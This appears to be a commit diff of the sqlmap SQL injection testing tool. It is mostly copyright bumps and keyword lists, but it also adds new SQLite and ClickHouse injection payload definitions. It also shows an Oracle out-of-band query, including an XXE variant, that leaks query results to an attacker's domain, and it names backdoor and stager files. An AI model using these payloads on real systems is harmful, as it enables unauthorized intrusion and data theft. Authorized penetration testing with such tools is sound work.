Fixes #5536

Implements option --time-limit (#5502 )
Fixes #5521
2025-12-06 20:51:31 +00:00 · 2023-10-06 19:48:30 +02:00 · 2023-09-28 20:34:52 +02:00 · 2023-09-07 11:03:01 +02:00 · 2023-09-04 18:47:25 +02:00 · 2023-09-04 18:34:21 +02:00
470 changed files with 2322 additions and 672 deletions
--- a/.github/ISSUE_TEMPLATE/bug_report.md
+++ b/.github/ISSUE_TEMPLATE/bug_report.md
@@ -21,10 +21,10 @@ A clear and concise description of what you expected to happen.
 If applicable, add screenshots to help explain your problem.
 **Running environment:**
- - sqlmap version [e.g. 1.3.5.93#dev]
+ - sqlmap version [e.g. 1.7.2.12#dev]
- - Installation method [e.g. git]
+ - Installation method [e.g. pip]
- - Operating system: [e.g. Microsoft Windows 10]
+ - Operating system: [e.g. Microsoft Windows 11]
- - Python version [e.g. 3.5.2]
+ - Python version [e.g. 3.11.2]
 **Target details:**
 - DBMS [e.g. Microsoft SQL Server]
--- a/.github/workflows/tests.yml
+++ b/.github/workflows/tests.yml
@@ -10,7 +10,7 @@ jobs:
    strategy:
      matrix:
        os: [ubuntu-latest, macos-latest, windows-latest]
-        python-version: [ '2.x', '3.10', 'pypy-2.7', 'pypy-3.7' ]
+        python-version: [ '3.11', 'pypy-2.7', 'pypy-3.7' ]
    steps:
      - uses: actions/checkout@v2
      - name: Set up Python
--- a/2
+++ b/2
@@ -1,7 +1,7 @@
 COPYING -- Describes the terms under which sqlmap is distributed. A copy
 of the GNU General Public License (GPL) is appended to this file.
-sqlmap is (C) 2006-2022 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+sqlmap is (C) 2006-2023 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
 This program is free software; you may redistribute and/or modify it under
 the terms of the GNU General Public License as published by the Free
--- a/README.md
+++ b/README.md
@@ -69,6 +69,7 @@ Translations
 * [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
 * [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)
 * [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md)
 * [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md)
 * [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
 * [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
 * [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)
--- a/data/procs/oracle/dns_request.sql
+++ b/data/procs/oracle/dns_request.sql
@@ -1,2 +1,3 @@
 SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
 # or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
 # or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%/"> %remote;]>'),'/l') FROM dual 
--- a/data/shell/backdoors/backdoor.asp_
+++ b/data/shell/backdoors/backdoor.asp_
--- a/data/shell/backdoors/backdoor.aspx_
+++ b/data/shell/backdoors/backdoor.aspx_
--- a/data/shell/backdoors/backdoor.jsp_
+++ b/data/shell/backdoors/backdoor.jsp_
--- a/data/shell/backdoors/backdoor.php_
+++ b/data/shell/backdoors/backdoor.php_
--- a/data/shell/stagers/stager.asp_
+++ b/data/shell/stagers/stager.asp_
--- a/data/shell/stagers/stager.aspx_
+++ b/data/shell/stagers/stager.aspx_
--- a/data/shell/stagers/stager.jsp_
+++ b/data/shell/stagers/stager.jsp_
--- a/data/shell/stagers/stager.php_
+++ b/data/shell/stagers/stager.php_
--- a/data/txt/common-columns.txt
+++ b/data/txt/common-columns.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 id
@@ -1844,6 +1844,10 @@ banner_id
 error
 language_id
 val
 parol
 familiya
 imya
 otchestvo
 # site:jp
@@ -2731,6 +2735,34 @@ ssn
 account
 confidential
 # site:nl
 naam
 straat
 gemeente
 beschrijving
 id_gebruiker
 gebruiker_id
 gebruikersnaam
 wachtwoord
 telefoon
 voornaam
 achternaam
 geslacht
 huisnummer
 gemeente
 leeftijd
 # site:cn
 yonghuming
 mima
 xingming
 xingbie
 touxiang
 youxiang
 shouji
 # Misc
 u_pass
--- a/data/txt/common-files.txt
+++ b/data/txt/common-files.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 # CTFs
--- a/data/txt/common-outputs.txt
+++ b/data/txt/common-outputs.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 [Banners]
@@ -399,6 +399,7 @@ XDBWEBSERVICES
 # MySQL
 information_schema
 performance_schema
 mysql
 phpmyadmin
--- a/data/txt/common-tables.txt
+++ b/data/txt/common-tables.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 users
@@ -3578,3 +3578,11 @@ users
 user_usergroup_map
 viewlevels
 weblinks
 # site:nl
 gebruikers
 # site:cn
 yonghu
--- a/data/txt/keywords.txt
+++ b/data/txt/keywords.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 # SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml)
@@ -452,6 +452,762 @@ WRITEXOR
 YEAR_MONTH
 ZEROFILL
 # MySQL 8.0 keywords (reference: https://dev.mysql.com/doc/refman/8.0/en/keywords.html)
 ACCESSIBLE
 ACCOUNT
 ACTION
 ACTIVE
 ADD
 ADMIN
 AFTER
 AGAINST
 AGGREGATE
 ALGORITHM
 ALL
 ALTER
 ALWAYS
 ANALYSE
 ANALYZE
 AND
 ANY
 ARRAY
 AS
 ASC
 ASCII
 ASENSITIVE
 AT
 ATTRIBUTE
 AUTHENTICATION
 AUTOEXTEND_SIZE
 AUTO_INCREMENT
 AVG
 AVG_ROW_LENGTH
 BACKUP
 BEFORE
 BEGIN
 BETWEEN
 BIGINT
 BINARY
 BINLOG
 BIT
 BLOB
 BLOCK
 BOOL
 BOOLEAN
 BOTH
 BTREE
 BUCKETS
 BULK
 BY
 BYTE
 CACHE
 CALL
 CASCADE
 CASCADED
 CASE
 CATALOG_NAME
 CHAIN
 CHALLENGE_RESPONSE
 CHANGE
 CHANGED
 CHANNEL
 CHAR
 CHARACTER
 CHARSET
 CHECK
 CHECKSUM
 CIPHER
 CLASS_ORIGIN
 CLIENT
 CLONE
 CLOSE
 COALESCE
 CODE
 COLLATE
 COLLATION
 COLUMN
 COLUMNS
 COLUMN_FORMAT
 COLUMN_NAME
 COMMENT
 COMMIT
 COMMITTED
 COMPACT
 COMPLETION
 COMPONENT
 COMPRESSED
 COMPRESSION
 CONCURRENT
 CONDITION
 CONNECTION
 CONSISTENT
 CONSTRAINT
 CONSTRAINT_CATALOG
 CONSTRAINT_NAME
 CONSTRAINT_SCHEMA
 CONTAINS
 CONTEXT
 CONTINUE
 CONVERT
 CPU
 CREATE
 CROSS
 CUBE
 CUME_DIST
 CURRENT
 CURRENT_DATE
 CURRENT_TIME
 CURRENT_TIMESTAMP
 CURRENT_USER
 CURSOR
 CURSOR_NAME
 DATA
 DATABASE
 DATABASES
 DATAFILE
 DATE
 DATETIME
 DAY
 DAY_HOUR
 DAY_MICROSECOND
 DAY_MINUTE
 DAY_SECOND
 DEALLOCATE
 DEC
 DECIMAL
 DECLARE
 DEFAULT
 DEFAULT_AUTH
 DEFINER
 DEFINITION
 DELAYED
 DELAY_KEY_WRITE
 DELETE
 DENSE_RANK
 DESC
 DESCRIBE
 DESCRIPTION
 DES_KEY_FILE
 DETERMINISTIC
 DIAGNOSTICS
 DIRECTORY
 DISABLE
 DISCARD
 DISK
 DISTINCT
 DISTINCTROW
 DIV
 DO
 DOUBLE
 DROP
 DUAL
 DUMPFILE
 DUPLICATE
 DYNAMIC
 EACH
 ELSE
 ELSEIF
 EMPTY
 ENABLE
 ENCLOSED
 ENCRYPTION
 END
 ENDS
 ENFORCED
 ENGINE
 ENGINES
 ENGINE_ATTRIBUTE
 ENUM
 ERROR
 ERRORS
 ESCAPE
 ESCAPED
 EVENT
 EVENTS
 EVERY
 EXCEPT
 EXCHANGE
 EXCLUDE
 EXECUTE
 EXISTS
 EXIT
 EXPANSION
 EXPIRE
 EXPLAIN
 EXPORT
 EXTENDED
 EXTENT_SIZE
 FACTOR
 FAILED_LOGIN_ATTEMPTS
 FALSE
 FAST
 FAULTS
 FETCH
 FIELDS
 FILE
 FILE_BLOCK_SIZE
 FILTER
 FINISH
 FIRST
 FIRST_VALUE
 FIXED
 FLOAT
 FLOAT4
 FLOAT8
 FLUSH
 FOLLOWING
 FOLLOWS
 FOR
 FORCE
 FOREIGN
 FORMAT
 FOUND
 FROM
 FULL
 FULLTEXT
 FUNCTION
 GENERAL
 GENERATE
 GENERATED
 GEOMCOLLECTION
 GEOMETRY
 GEOMETRYCOLLECTION
 GET
 GET_FORMAT
 GET_MASTER_PUBLIC_KEY
 GET_SOURCE_PUBLIC_KEY
 GLOBAL
 GRANT
 GRANTS
 GROUP
 GROUPING
 GROUPS
 GROUP_REPLICATION
 GTID_ONLY
 HANDLER
 HASH
 HAVING
 HELP
 HIGH_PRIORITY
 HISTOGRAM
 HISTORY
 HOST
 HOSTS
 HOUR
 HOUR_MICROSECOND
 HOUR_MINUTE
 HOUR_SECOND
 IDENTIFIED
 IF
 IGNORE
 IGNORE_SERVER_IDS
 IMPORT
 IN
 INACTIVE
 INDEX
 INDEXES
 INFILE
 INITIAL
 INITIAL_SIZE
 INITIATE
 INNER
 INOUT
 INSENSITIVE
 INSERT
 INSERT_METHOD
 INSTALL
 INSTANCE
 INT
 INT1
 INT2
 INT3
 INT4
 INT8
 INTEGER
 INTERSECT
 INTERVAL
 INTO
 INVISIBLE
 INVOKER
 IO
 IO_AFTER_GTIDS
 IO_BEFORE_GTIDS
 IO_THREAD
 IPC
 IS
 ISOLATION
 ISSUER
 ITERATE
 JOIN
 JSON
 JSON_TABLE
 JSON_VALUE
 KEY
 KEYRING
 KEYS
 KEY_BLOCK_SIZE
 KILL
 LAG
 LANGUAGE
 LAST
 LAST_VALUE
 LATERAL
 LEAD
 LEADING
 LEAVE
 LEAVES
 LEFT
 LESS
 LEVEL
 LIKE
 LIMIT
 LINEAR
 LINES
 LINESTRING
 LIST
 LOAD
 LOCAL
 LOCALTIME
 LOCALTIMESTAMP
 LOCK
 LOCKED
 LOCKS
 LOGFILE
 LOGS
 LONG
 LONGBLOB
 LONGTEXT
 LOOP
 LOW_PRIORITY
 MASTER
 MASTER_AUTO_POSITION
 MASTER_BIND
 MASTER_COMPRESSION_ALGORITHMS
 MASTER_CONNECT_RETRY
 MASTER_DELAY
 MASTER_HEARTBEAT_PERIOD
 MASTER_HOST
 MASTER_LOG_FILE
 MASTER_LOG_POS
 MASTER_PASSWORD
 MASTER_PORT
 MASTER_PUBLIC_KEY_PATH
 MASTER_RETRY_COUNT
 MASTER_SERVER_ID
 MASTER_SSL
 MASTER_SSL_CA
 MASTER_SSL_CAPATH
 MASTER_SSL_CERT
 MASTER_SSL_CIPHER
 MASTER_SSL_CRL
 MASTER_SSL_CRLPATH
 MASTER_SSL_KEY
 MASTER_SSL_VERIFY_SERVER_CERT
 MASTER_TLS_CIPHERSUITES
 MASTER_TLS_VERSION
 MASTER_USER
 MASTER_ZSTD_COMPRESSION_LEVEL
 MATCH
 MAXVALUE
 MAX_CONNECTIONS_PER_HOUR
 MAX_QUERIES_PER_HOUR
 MAX_ROWS
 MAX_SIZE
 MAX_UPDATES_PER_HOUR
 MAX_USER_CONNECTIONS
 MEDIUM
 MEDIUMBLOB
 MEDIUMINT
 MEDIUMTEXT
 MEMBER
 MEMORY
 MERGE
 MESSAGE_TEXT
 MICROSECOND
 MIDDLEINT
 MIGRATE
 MINUTE
 MINUTE_MICROSECOND
 MINUTE_SECOND
 MIN_ROWS
 MOD
 MODE
 MODIFIES
 MODIFY
 MONTH
 MULTILINESTRING
 MULTIPOINT
 MULTIPOLYGON
 MUTEX
 MYSQL_ERRNO
 NAME
 NAMES
 NATIONAL
 NATURAL
 NCHAR
 NDB
 NDBCLUSTER
 NESTED
 NETWORK_NAMESPACE
 NEVER
 NEW
 NEXT
 NO
 NODEGROUP
 NONE
 NOT
 NOWAIT
 NO_WAIT
 NO_WRITE_TO_BINLOG
 NTH_VALUE
 NTILE
 NULL
 NULLS
 NUMBER
 NUMERIC
 NVARCHAR
 OF
 OFF
 OFFSET
 OJ
 OLD
 ON
 ONE
 ONLY
 OPEN
 OPTIMIZE
 OPTIMIZER_COSTS
 OPTION
 OPTIONAL
 OPTIONALLY
 OPTIONS
 OR
 ORDER
 ORDINALITY
 ORGANIZATION
 OTHERS
 OUT
 OUTER
 OUTFILE
 OVER
 OWNER
 PACK_KEYS
 PAGE
 PARSER
 PARTIAL
 PARTITION
 PARTITIONING
 PARTITIONS
 PASSWORD_LOCK_TIME
 PATH
 PERCENT_RANK
 PERSIST
 PERSIST_ONLY
 PHASE
 PLUGIN
 PLUGINS
 PLUGIN_DIR
 POINT
 POLYGON
 PORT
 PRECEDES
 PRECEDING
 PRECISION
 PREPARE
 PRESERVE
 PREV
 PRIMARY
 PRIVILEGES
 PRIVILEGE_CHECKS_USER
 PROCEDURE
 PROCESS
 PROCESSLIST
 PROFILE
 PROFILES
 PROXY
 PURGE
 QUARTER
 QUERY
 QUICK
 RANDOM
 RANGE
 RANK
 READ
 READS
 READ_ONLY
 READ_WRITE
 REAL
 REBUILD
 RECOVER
 RECURSIVE
 REDOFILE
 REDO_BUFFER_SIZE
 REDUNDANT
 REFERENCE
 REFERENCES
 REGEXP
 REGISTRATION
 RELAY
 RELAYLOG
 RELAY_LOG_FILE
 RELAY_LOG_POS
 RELAY_THREAD
 RELEASE
 RELOAD
 REMOTE
 REMOVE
 RENAME
 REORGANIZE
 REPAIR
 REPEAT
 REPEATABLE
 REPLACE
 REPLICA
 REPLICAS
 REPLICATE_DO_DB
 REPLICATE_DO_TABLE
 REPLICATE_IGNORE_DB
 REPLICATE_IGNORE_TABLE
 REPLICATE_REWRITE_DB
 REPLICATE_WILD_DO_TABLE
 REPLICATE_WILD_IGNORE_TABLE
 REPLICATION
 REQUIRE
 REQUIRE_ROW_FORMAT
 RESET
 RESIGNAL
 RESOURCE
 RESPECT
 RESTART
 RESTORE
 RESTRICT
 RESUME
 RETAIN
 RETURN
 RETURNED_SQLSTATE
 RETURNING
 RETURNS
 REUSE
 REVERSE
 REVOKE
 RIGHT
 RLIKE
 ROLE
 ROLLBACK
 ROLLUP
 ROTATE
 ROUTINE
 ROW
 ROWS
 ROW_COUNT
 ROW_FORMAT
 ROW_NUMBER
 RTREE
 SAVEPOINT
 SCHEDULE
 SCHEMA
 SCHEMAS
 SCHEMA_NAME
 SECOND
 SECONDARY
 SECONDARY_ENGINE
 SECONDARY_ENGINE_ATTRIBUTE
 SECONDARY_LOAD
 SECONDARY_UNLOAD
 SECOND_MICROSECOND
 SECURITY
 SELECT
 SENSITIVE
 SEPARATOR
 SERIAL
 SERIALIZABLE
 SERVER
 SESSION
 SET
 SHARE
 SHOW
 SHUTDOWN
 SIGNAL
 SIGNED
 SIMPLE
 SKIP
 SLAVE
 SLOW
 SMALLINT
 SNAPSHOT
 SOCKET
 SOME
 SONAME
 SOUNDS
 SOURCE
 SOURCE_AUTO_POSITION
 SOURCE_BIND
 SOURCE_COMPRESSION_ALGORITHMS
 SOURCE_CONNECT_RETRY
 SOURCE_DELAY
 SOURCE_HEARTBEAT_PERIOD
 SOURCE_HOST
 SOURCE_LOG_FILE
 SOURCE_LOG_POS
 SOURCE_PASSWORD
 SOURCE_PORT
 SOURCE_PUBLIC_KEY_PATH
 SOURCE_RETRY_COUNT
 SOURCE_SSL
 SOURCE_SSL_CA
 SOURCE_SSL_CAPATH
 SOURCE_SSL_CERT
 SOURCE_SSL_CIPHER
 SOURCE_SSL_CRL
 SOURCE_SSL_CRLPATH
 SOURCE_SSL_KEY
 SOURCE_SSL_VERIFY_SERVER_CERT
 SOURCE_TLS_CIPHERSUITES
 SOURCE_TLS_VERSION
 SOURCE_USER
 SOURCE_ZSTD_COMPRESSION_LEVEL
 SPATIAL
 SPECIFIC
 SQL
 SQLEXCEPTION
 SQLSTATE
 SQLWARNING
 SQL_AFTER_GTIDS
 SQL_AFTER_MTS_GAPS
 SQL_BEFORE_GTIDS
 SQL_BIG_RESULT
 SQL_BUFFER_RESULT
 SQL_CACHE
 SQL_CALC_FOUND_ROWS
 SQL_NO_CACHE
 SQL_SMALL_RESULT
 SQL_THREAD
 SQL_TSI_DAY
 SQL_TSI_HOUR
 SQL_TSI_MINUTE
 SQL_TSI_MONTH
 SQL_TSI_QUARTER
 SQL_TSI_SECOND
 SQL_TSI_WEEK
 SQL_TSI_YEAR
 SRID
 SSL
 STACKED
 START
 STARTING
 STARTS
 STATS_AUTO_RECALC
 STATS_PERSISTENT
 STATS_SAMPLE_PAGES
 STATUS
 STOP
 STORAGE
 STORED
 STRAIGHT_JOIN
 STREAM
 STRING
 SUBCLASS_ORIGIN
 SUBJECT
 SUBPARTITION
 SUBPARTITIONS
 SUPER
 SUSPEND
 SWAPS
 SWITCHES
 SYSTEM
 TABLE
 TABLES
 TABLESPACE
 TABLE_CHECKSUM
 TABLE_NAME
 TEMPORARY
 TEMPTABLE
 TERMINATED
 TEXT
 THAN
 THEN
 THREAD_PRIORITY
 TIES
 TIME
 TIMESTAMP
 TIMESTAMPADD
 TIMESTAMPDIFF
 TINYBLOB
 TINYINT
 TINYTEXT
 TLS
 TO
 TRAILING
 TRANSACTION
 TRIGGER
 TRIGGERS
 TRUE
 TRUNCATE
 TYPE
 TYPES
 UNBOUNDED
 UNCOMMITTED
 UNDEFINED
 UNDO
 UNDOFILE
 UNDO_BUFFER_SIZE
 UNICODE
 UNINSTALL
 UNION
 UNIQUE
 UNKNOWN
 UNLOCK
 UNREGISTER
 UNSIGNED
 UNTIL
 UPDATE
 UPGRADE
 URL
 USAGE
 USE
 USER
 USER_RESOURCES
 USE_FRM
 USING
 UTC_DATE
 UTC_TIME
 UTC_TIMESTAMP
 VALIDATION
 VALUE
 VALUES
 VARBINARY
 VARCHAR
 VARCHARACTER
 VARIABLES
 VARYING
 VCPU
 VIEW
 VIRTUAL
 VISIBLE
 WAIT
 WARNINGS
 WEEK
 WEIGHT_STRING
 WHEN
 WHERE
 WHILE
 WINDOW
 WITH
 WITHOUT
 WORK
 WRAPPER
 WRITE
 X509
 XA
 XID
 XML
 XOR
 YEAR
 YEAR_MONTH
 ZEROFILL
 ZONE
 # PostgreSQL|SQL:2016|SQL:2011 reserved words (reference: https://www.postgresql.org/docs/current/sql-keywords-appendix.html)
 ABS
@@ -872,3 +1628,8 @@ XMLTABLE
 XMLTEXT
 XMLVALIDATE
 YEAR
 # Misc
 ORD
 MID
--- a/data/txt/user-agents.txt
+++ b/data/txt/user-agents.txt
@@ -1,4 +1,4 @@
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 # Opera
--- a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
+++ b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
--- a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
+++ b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
--- a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
+++ b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
--- a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
+++ b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
--- a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
+++ b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
--- a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
+++ b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
--- a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
+++ b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
--- a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
+++ b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
--- a/data/xml/errors.xml
+++ b/data/xml/errors.xml
@@ -211,6 +211,11 @@
        <error regexp="Syntax error,[^\n]+assumed to mean"/>
    </dbms>
    <dbms value="ClickHouse">
        <error regexp="Code: \d+. DB::Exception:"/>
        <error regexp="Syntax error: failed at position \d+"/>
    </dbms>
    <dbms value="CrateDB">
        <error regexp="io\.crate\.client\.jdbc"/>
    </dbms>
--- a/data/xml/payloads/boolean_blind.xml
+++ b/data/xml/payloads/boolean_blind.xml
@@ -596,6 +596,45 @@ Tag: <test>
            <dbms>Oracle</dbms>
        </details>
    </test>
    <test>
        <title>SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title>
        <stype>1</stype>
        <level>2</level>
        <risk>1</risk>
        <clause>1</clause>
        <where>1</where>
        <vector>AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</vector>
        <request>
            <payload>AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</payload>
        </request>
        <response>
            <comparison>AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</comparison>
        </response>
        <details>
            <dbms>SQLite</dbms>
        </details>
    </test>
    <test>
        <title>SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title>
        <stype>1</stype>
        <level>3</level>
        <risk>3</risk>
        <clause>1</clause>
        <where>2</where>
        <vector>OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</vector>
        <request>
            <payload>OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</payload>
        </request>
        <response>
            <comparison>OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</comparison>
        </response>
        <details>
            <dbms>SQLite</dbms>
        </details>
    </test>
    <!-- End of boolean-based blind tests - WHERE or HAVING clause -->
    <!-- Boolean-based blind tests - Parameter replace -->
--- a/data/xml/payloads/error_based.xml
+++ b/data/xml/payloads/error_based.xml
@@ -838,7 +838,7 @@
        <title>IBM DB2 OR error-based - WHERE or HAVING clause</title>
        <stype>2</stype>
        <level>4</level>
-        <risk>1</risk>
+        <risk>3</risk>
        <clause>1</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
@@ -853,6 +853,44 @@
        </details>
    </test>
    <test>
        <title>ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
        <stype>2</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
        <request>
            <payload>AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>ClickHouse</dbms>
        </details>
    </test>
    <test>
        <title>ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
        <stype>2</stype>
        <level>4</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
        <request>
            <payload>OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>ClickHouse</dbms>
        </details>
    </test>
    <!--
         TODO: if possible, add payload for SQLite, Microsoft Access,
         and SAP MaxDB - no known techniques at this time
--- a/data/xml/payloads/inline_query.xml
+++ b/data/xml/payloads/inline_query.xml
@@ -133,5 +133,25 @@
            <dbms>Firebird</dbms>
        </details>
    </test>
    <test>
        <title>ClickHouse inline queries</title>
        <stype>3</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,2,3,8</clause>
        <where>3</where>
